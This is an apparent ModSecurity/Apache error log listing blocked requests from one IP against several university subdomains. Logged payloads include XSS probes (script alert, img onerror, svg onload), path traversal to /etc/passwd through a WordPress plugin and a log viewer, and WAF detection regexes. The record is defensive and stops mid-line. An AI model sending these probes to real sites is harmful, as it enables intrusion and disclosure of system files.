[Tue Aug 29 11:55:23.997579 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/atmail/"] [unique_id "ZO16O8Co-f0AAAolKngAAAAe"]
[Tue Aug 29 11:55:24.001197 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:url: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZO16O8Co-f0AAApbUggAAAAh"]
[Tue Aug 29 11:55:24.018641 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:q: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/templates/m/inc_head.php"] [unique_id "ZO16PMCo-f0AAAolKnkAAAAe"]
[Tue Aug 29 11:55:24.018806 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/atmail/"] [unique_id "ZO16PMCo-f0AAApa-OkAAAAg"]
[Tue Aug 29 11:55:24.047176 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/atmail/"] [unique_id "ZO16PMCo-f0AAAqSws0AAAAN"]
[Tue Aug 29 11:55:24.540432 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/atmail/webmail/"] [unique_id "ZO16PMCo-f0AAAoAlAIAAAAC"]
[Tue Aug 29 11:55:24.559722 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/atmail/webmail/"] [unique_id "ZO16PMCo-f0AAApXgowAAAAU"]
[Tue Aug 29 11:55:24.564052 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/atmail/webmail/"] [unique_id "ZO16PMCo-f0AAAoAlAMAAAAC"]
[Tue Aug 29 11:55:24.587309 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:operation. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:operation: 11111111</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet"] [unique_id "ZO16PMCo-f0AAApXgo0AAAAU"]
[Tue Aug 29 11:55:24.591693 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:operation. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:operation: 11111111</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet"] [unique_id "ZO16PMCo-f0AAApa-OwAAAAg"]
[Tue Aug 29 11:55:24.608233 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/atmail/webmail/"] [unique_id "ZO16PMCo-f0AAApXgo4AAAAU"]
[Tue Aug 29 11:55:24.620554 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:operation. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:operation: 11111111</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet"] [unique_id "ZO16PMCo-f0AAApa-O0AAAAg"]
[Tue Aug 29 11:55:24.640385 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:operation. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:operation: 11111111</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet"] [unique_id "ZO16PMCo-f0AAApa-O4AAAAg"]
[Tue Aug 29 11:55:24.746029 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:url: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZO16PMCo-f0AAApbUgwAAAAh"]
[Tue Aug 29 11:55:24.746821 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:operation. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:operation: 11111111</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet"] [unique_id "ZO16PMCo-f0AAAqqtfUAAAAA"]
[Tue Aug 29 11:55:24.747267 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:log: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO16PMCo-f0AAAolKoQAAAAe"]
[Tue Aug 29 11:55:24.787515 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/atmail/webmail/"] [unique_id "ZO16PMCo-f0AAApbUg0AAAAh"]
[Tue Aug 29 11:55:25.644160 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:language: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO16PcCo-f0AAAqqtfYAAAAA"]
[Tue Aug 29 11:55:25.757705 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:language: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO16PcCo-f0AAAolKoYAAAAe"]
[Tue Aug 29 11:55:25.760481 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:language: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO16PcCo-f0AAAoz8FcAAAAS"]
[Tue Aug 29 11:55:25.819591 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:language: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/webmail/"] [unique_id "ZO16PcCo-f0AAAqTvq0AAAAa"]
[Tue Aug 29 11:55:25.902703 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:language: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO16PcCo-f0AAApbUhEAAAAh"]
[Tue Aug 29 11:55:25.940706 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:fccc'\\\\"><svg/onload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: < found within ARGS_NAMES:fccc'\\x5c\\x5c\\x22><svg/onload: fccc'\\x5c\\x22><svg/onload"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/webapp/"] [unique_id "ZO16PcCo-f0AAAqeFWAAAAAx"]
[Tue Aug 29 11:55:25.946095 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at ARGS_NAMES:fccc'\\\\"><svg/onload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: '\\x5c\\x22><svg/o found within ARGS_NAMES:fccc'\\x5c\\x5c\\x22><svg/onload: fccc'\\x5c\\x22><svg/onload"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "ft.unla.ac.id"] [uri "/webapp/"] [unique_id "ZO16PcCo-f0AAAoz8FoAAAAS"]
[Tue Aug 29 11:55:25.947582 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:fccc'\\\\"><svg/onload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:fccc'\\x5c\\x5c\\x22><svg/onload: alert(/xss/)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/webapp/"] [unique_id "ZO16PcCo-f0AAAqsV7IAAAAB"]
[Tue Aug 29 11:55:25.968288 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:operation. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:operation: 11111111</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet"] [unique_id "ZO16PcCo-f0AAAolKooAAAAe"]
[Tue Aug 29 11:55:25.982893 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag 